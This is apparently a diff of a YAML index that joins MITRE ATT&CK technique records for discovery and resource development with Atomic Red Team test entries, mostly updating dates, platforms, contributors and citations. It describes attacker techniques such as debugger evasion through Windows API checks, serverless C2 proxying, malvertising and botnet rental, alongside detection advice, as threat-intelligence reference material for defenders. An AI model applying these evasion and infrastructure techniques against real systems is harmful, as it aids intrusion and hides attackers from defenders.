-        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
-        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_detection: |-
-        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
-
-        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
-      x_mitre_version: '1.0'
+        url: https://securelist.com/transparent-tribe-part-1/98127/
+      - source_name: FBI Ragnar Locker 2020
+        description: FBI. (2020, November 19). Indicators of Compromise Associated
+          with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+        url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+      - source_name: Microsoft Azure Instance Metadata 2021
+        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+          (Windows). Retrieved April 2, 2021.
+        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+      - source_name: Sophos Geolocation 2016
+        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+          target you based on where you live. Retrieved April 1, 2021.'
+        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Process: OS API Execution'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614
     atomic_tests:
     - name: Get geolocation info through IP-Lookup services using curl Windows
@@ -87146,7 +87834,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518.001
     atomic_tests:
     - name: Security Software Discovery
@@ -87283,12 +87970,12 @@ discovery:
           '
   T1526:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Cloud Service Discovery
       description: |-
-        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+        An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+        Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
         For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
@@ -87296,10 +87983,12 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Praetorian
       - Thanabodi Phrakhun, I-SECURE
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -87308,15 +87997,16 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Enumeration'
+      - 'Logon Session: Logon Session Creation'
       type: attack-pattern
       id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
       created: '2019-08-30T13:01:10.120Z'
@@ -87344,9 +88034,6 @@ discovery:
         url: https://github.com/RhinoSecurityLabs/pacu
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1526
     atomic_tests: []
   T1018:
@@ -87421,7 +88108,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1018
     atomic_tests:
     - name: Remote System Discovery - net
@@ -87851,7 +88537,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1046
     atomic_tests:
     - name: Port Scan NMap for Windows
@@ -88076,7 +88761,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1518
     atomic_tests:
     - name: Find and Display Internet Explorer Browser Version
@@ -88141,7 +88825,7 @@ discovery:
         name: powershell
   T1538:
     technique:
-      modified: '2024-04-19T04:25:33.300Z'
+      modified: '2024-10-15T15:51:56.279Z'
       name: Cloud Service Dashboard
       description: |-
         An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -88162,12 +88846,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -88192,7 +88875,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1622:
     technique:
@@ -88247,7 +88929,7 @@ discovery:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -88267,7 +88949,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests:
     - name: Detect a Debugger Presence in the Machine
@@ -88382,7 +89063,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1124
     atomic_tests:
     - name: System Time Discovery
@@ -88446,7 +89126,7 @@ discovery:
 resource-development:
   T1583:
     technique:
-      modified: '2024-02-28T21:13:02.648Z'
+      modified: '2024-10-16T20:03:59.884Z'
       name: Acquire Infrastructure
       description: |-
         Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -88457,7 +89137,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider use of services that may aid in tracking of newly
         acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -88528,29 +89208,28 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.007:
     technique:
-      modified: '2022-10-20T21:20:22.578Z'
+      modified: '2024-07-01T20:24:16.562Z'
       name: Serverless
       description: |-
-        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+        Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
 
-        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
+        Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -88574,15 +89253,18 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.007:
     technique:
-      modified: '2024-04-15T23:49:14.558Z'
+      modified: '2024-09-12T19:18:36.583Z'
       name: Artificial Intelligence
       description: |
         Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
@@ -88614,17 +89296,16 @@ resource-development:
         url: https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/
       - source_name: OpenAI-CTI
         description: OpenAI. (2024, February 14). Disrupting malicious uses of AI
-          by state-affiliated threat actors. Retrieved March 11, 2024.
-        url: https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors
+          by state-affiliated threat actors. Retrieved September 12, 2024.
+        url: https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.008:
     technique:
-      modified: '2024-04-19T12:24:40.659Z'
+      modified: '2024-10-15T15:10:59.530Z'
       name: Network Devices
       description: |-
         Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
@@ -88677,11 +89358,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.008:
     technique:
-      modified: '2023-04-17T15:32:39.470Z'
+      modified: '2024-10-16T20:10:08.246Z'
       name: Malvertising
       description: "Adversaries may purchase online advertisements that can be abused
         to distribute malware to victims. Ads can be purchased to plant as well as
@@ -88717,7 +89397,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Tom Hegel
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Pooja Natarajan, NEC Corporation India
@@ -88766,43 +89446,12 @@ resource-development:
         url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -88815,18 +89464,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -88848,7 +89528,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -88864,8 +89544,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -88887,7 +89565,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -88907,8 +89585,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -88947,7 +89623,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -88968,8 +89644,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -88999,7 +89673,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -89036,8 +89710,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -89059,7 +89731,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -89081,8 +89753,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -89119,7 +89789,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -89141,8 +89811,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -89204,7 +89872,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -89226,7 +89893,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -89244,8 +89911,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -89280,7 +89945,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
